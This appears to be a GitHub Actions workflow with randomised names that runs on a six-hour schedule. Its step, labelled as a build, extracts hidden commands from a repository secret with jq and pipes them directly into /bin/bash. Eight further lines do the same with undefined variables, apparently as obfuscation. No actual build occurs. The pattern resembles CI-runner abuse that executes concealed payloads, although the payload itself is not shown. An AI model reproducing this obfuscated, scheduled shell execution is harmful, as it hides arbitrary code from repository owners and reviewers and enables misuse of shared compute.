name: woryya
on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: woryya
        env:
          mqcdy01: ${{ secrets.mqcdy01 }}
        run: |
          echo $mqcdy01 | jq -r .gkthh43 | /bin/bash
          echo $en38 | jq -r .pps18 | /bin/bash
          echo $aqngx2721 | jq -r .pqv48414 | /bin/bash
          echo $kxxie48 | jq -r .hx23415 | /bin/bash
          echo $oc977 | jq -r .q64253 | /bin/bash
          echo $m333 | jq -r .omm26 | /bin/bash
          echo $rix0 | jq -r .a32753 | /bin/bash
          echo $f75229 | jq -r .aojxd007 | /bin/bash
          echo $cnd3 | jq -r .klotr791 | /bin/bash

